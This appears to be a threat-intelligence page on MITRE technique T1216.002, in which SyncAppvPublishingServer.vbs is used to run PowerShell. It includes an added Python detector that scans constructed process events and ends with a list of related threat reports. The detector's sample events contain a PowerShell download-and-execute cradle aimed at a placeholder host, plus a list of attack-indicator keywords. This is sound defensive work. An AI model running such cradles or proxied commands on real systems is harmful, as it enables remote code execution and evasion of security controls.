Common Information
Type | Value |
---|---|
Value | SyncAppvPublishingServer - T1216.002 |
Category | Attack-Pattern |
Type | Mitre-Attack-Pattern |
Misp Type | Cluster |
Description | Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv) The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv) Adversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive countermeasures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv) `SyncAppvPublishingServer.vbs "n; {PowerShell}"` |
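The description above gives the invocation shape, `SyncAppvPublishingServer.vbs "n; {PowerShell}"`: the script host (`wscript.exe`/`cscript.exe`) runs a signed Microsoft script, and whatever follows the `;` in the quoted argument is what reaches PowerShell, so `powershell.exe` never appears as the created process. The following detection logic is an added example, not code from MITRE or the MISP project. It runs over constructed process-creation records modelled on Sysmon Event ID 1 fields (`Image`, `ParentImage`, `CommandLine`); the field names, the indicator list, the Office-parent list and the severity thresholds are all assumptions for illustration.

```python
"""Heuristic detection of SyncAppvPublishingServer.vbs PowerShell proxying
(T1216.002) over process-creation records.

Added example; not MITRE's or MISP's code. The events below are constructed
to resemble Sysmon Event ID 1 fields. Field names, indicator tokens and
severity levels are assumptions chosen for illustration.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # interactive abuse: PowerShell cmdlet smuggled after the ';'
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'''wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; Start-Process calc.exe"''',
    },
    {   # Office-spawned download cradle (cf. the PowerPoint mouse-over cases on this page)
        "Image": r"C:\Windows\System32\cscript.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
        "CommandLine": r'''cscript.exe SyncAppvPublishingServer.vbs "n;(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1') | IEX"''',
    },
    {   # script invoked with nothing after the ';' (no smuggled command)
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r'''wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;"''',
    },
    {   # unrelated process: must not fire
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'''notepad.exe C:\Users\user\notes.txt''',
    },
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Quoted argument in the form the technique description shows: "n; {PowerShell}".
ARG_RE = re.compile(r'SyncAppvPublishingServer\.vbs\s+"([^"]*)"', re.IGNORECASE)
# Assumed indicator tokens commonly seen in smuggled PowerShell payloads.
PS_INDICATORS = ("iex", "invoke-expression", "downloadstring", "new-object",
                 "start-process", "invoke-webrequest", "frombase64string", "-enc")
# Assumed list of Office parents that should never be launching this script.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


@dataclass
class Finding:
    severity: str   # "low" | "medium" | "high"
    reason: str
    payload: str    # text after the ';' that would be handed to PowerShell


def analyze(event: dict) -> Optional[Finding]:
    """Return a Finding if the event looks like T1216.002, else None."""
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "").lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if "syncappvpublishingserver.vbs" not in cmd.lower():
        return None
    if not image.endswith(SCRIPT_HOSTS):
        # Only the script hosts execute the .vbs; other references are out of scope here.
        return None
    m = ARG_RE.search(cmd)
    arg = m.group(1) if m else ""
    # Mirror the technique's syntax: everything after the first ';' reaches PowerShell.
    _, sep, payload = arg.partition(";")
    payload = payload.strip()
    if not sep or not payload:
        return Finding("low", "script executed with no command after ';'", payload)
    hits = [t for t in PS_INDICATORS if t in payload.lower()]
    reasons = []
    if hits:
        reasons.append("PowerShell indicators after ';': " + ", ".join(hits))
    if parent in OFFICE_PARENTS:
        reasons.append("launched by Office parent " + parent)
    if reasons:
        return Finding("high", "; ".join(reasons), payload)
    return Finding("medium", "non-empty command passed after ';'", payload)


def scan(events) -> list:
    """Return (index, Finding) pairs for every event that triggers."""
    return [(i, f) for i, e in enumerate(events) if (f := analyze(e)) is not None]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding.severity:6} {finding.reason} | payload={finding.payload!r}")
```

The split on the first `;` is deliberate: the page's own syntax puts the PowerShell command after that separator, so alerting on `powershell.exe` process creation alone misses this technique entirely; the thing to log and inspect is the script host's full command line. Tune the indicator and parent lists to your environment before deploying.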
Details | CTI | Published | Attributes | Title |
---|---|---|---|---|
Details | Website | 2024-11-01 | 4 | Finding the LNK: Techniques and methodology for advanced analysis with Velociraptor \| Rapid7 Blog |
Details | Website | 2024-09-02 | 51 | Stone Wolf employs Meduza Stealer to hack Russian companies |
Details | Website | 2023-10-03 | 94 | Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement \| Microsoft Security Blog |
Details | Website | 2023-09-19 | 100 | Unveiling the Shadows: The Dark Alliance between GuLoader and Remcos - Check Point Research |
Details | Website | 2023-08-07 | 2 | Run Powershell command without Powershell.exe |
Details | Website | 2023-06-19 | 24 | APT-41 Backdoor Analysis |
Details | Website | 2022-12-27 | 130 | BlueNoroff introduces new methods bypassing MoTW |
Details | Website | 2022-11-23 | 3 | Chrome Extension Deploy Windows Malware to Steal Crypto |
Details | Website | 2022-11-21 | 72 | ViperSoftX: Hiding in System Logs and Spreading VenomSoftX - Avast Threat Labs |
Details | Website | 2022-11-02 | 118 | Server-side attacks, C&C in public clouds and other MDR cases we observed |
Details | Website | 2022-09-29 | 3 | Fancy Bear Hackers Distributing Graphite Malware using PowerPoint Files |
Details | Website | 2022-09-27 | 3 | Fancy Bear hackers exploit PowerPoint files to spread Graphite malware \| IT PRO |
Details | Website | 2022-09-26 | 6 | Hackers use PowerPoint files for 'mouseover' malware delivery |
Details | Website | 2022-09-23 | 44 | In the footsteps of the Fancy Bear: PowerPoint mouse-over event abused to deliver Graphite implants |
Details | Website | 2022-03-17 | 36 | Suspected DarkHotel APT Activity Update |
Details | Website | 2022-01-31 | 83 | Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables |
Details | Website | 2018-12-27 | 37 | The Enigmatic "Roma225" Campaign - Yoroi |